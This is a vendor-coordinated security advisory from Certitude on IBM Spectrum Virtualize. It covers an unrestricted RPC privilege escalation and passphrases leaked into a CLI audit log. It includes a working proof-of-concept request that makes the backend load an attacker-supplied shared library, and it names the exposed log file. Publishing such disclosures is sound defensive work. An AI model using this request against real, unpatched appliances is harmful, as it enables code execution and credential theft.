~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Certitude Security Advisory - CSA-2023-001 ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ PRODUCT : Spectrum Virtualize VENDOR : IBM SEVERITY : High AFFECTED VERSION : <8.5.3.0, <8.5.2.3, <8.5.0.7, <8.4.0.10, <8.3.1.9, <8.2.1.17 IDENTIFIERS : CVE-2022-43870, CVE-2022-43873 PATCH VERSION : >=8.5.3.0, >=8.5.2.3, >=8.5.0.7, >=8.4.0.10, >=8.3.1.9, >=8.2.1.17 FOUND BY : Wolfgang Ettlinger, Certitude Lab ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Introduction ------------ IBM Spectrum Virtualize is a flexible storage appliance. During a very short test, multiple vulnerabilities have been identified in its firmware. Vulnerability Overview ---------------------- ### Privilege Escalation (CVE-2022-43873) The admininstrative web interface utilizes an RPC protocol between the frontend web application and the backend. This protocol allows the browser application to call Java methods on the backend. However, there is no restriction on the callable Java methods. Thus, an authenticated user can call any `public static` Java methods e.g. defined by the JRE or any software library in the classpath. As a result, many methods can be called that are not intended to be called in this scenario. Thus, low-privileged users can access functionality that allows code execution. ### Passwords in Log Files (CVE-2022-43870) Log files accessible to low-privileged users may contain passwords. Proof of Concept ---------------- ### Privilege Escalation (CVE-2022-43873) The following snippet shows a legitimate request issued by the frontend to the backend: ``` text POST /RPCAdapter?[CSRF Token Parameter] HTTP/1.1 Host: [...] Cookie: [...] { "clazz": "com.ibm.evo.rpc.RPCRequest", "methodClazz": "com.ibm.svc.gui.logic.ConfigRPC", "methodName": "getUpdateStatus", "methodArgs": [] } ``` The following snippet shows that the method `java.lang.System.load(String)` can be called with the parameter `/tmp/libtakeover.so`: ``` text POST /RPCAdapter?[CSRF Token Parameter] HTTP/1.1 Host: [...] Cookie: [...] { "clazz": "com.ibm.evo.rpc.RPCRequest", "methodClazz": "java.lang.System", "methodName": "load", "methodArgs":[ "/tmp/libtakeover.so" ] } ``` A low-privileged attacker could transfer a malicious shared library to `/tmp/libtakeover.so` using SCP. After executing the request above, the application server loads this library. An attacker can e.g. gain code execution by declaring a function that is to be called upon loading of the shared library (e.g. ld parameter `-init`). ### Passwords in Log Files (CVE-2022-43870) The parameters `authpassphrase` and `privpassphrase` to the `mksnmpserver` command are not masked in the CLI logfile `/var/log/cli_audit`. This logfile is accessible to all system users (e.g. via SCP). Resolution ---------- IBM has issued updates addressing both issues. Additional information can be retrieved from the security bulletins: - https://www.ibm.com/support/pages/node/6858047 - https://www.ibm.com/support/pages/node/6858045 References ---------- - https://certitude.consulting/advisories/CSA_2023_001_IBM_Spectrum_Virtualize_Multiple_Vulnerabilities.md.txt - https://certitude.consulting/blog/en/privilege-escalation-in-ibm-spectrum-virtualize/ Timeline -------- --------------------------------------------------------------------------- Date Text ------------ -------------------------------------------------------------- 2022-10-20 Uploading advisory to HackerOne 2022-10-24 IBM: team is reviewing issues 2023-02-28 IBM pushlishes security bulletin 2023-08-17 Public release of the advisory --------------------------------------------------------------------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (c) 2023 Certitude Consulting GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~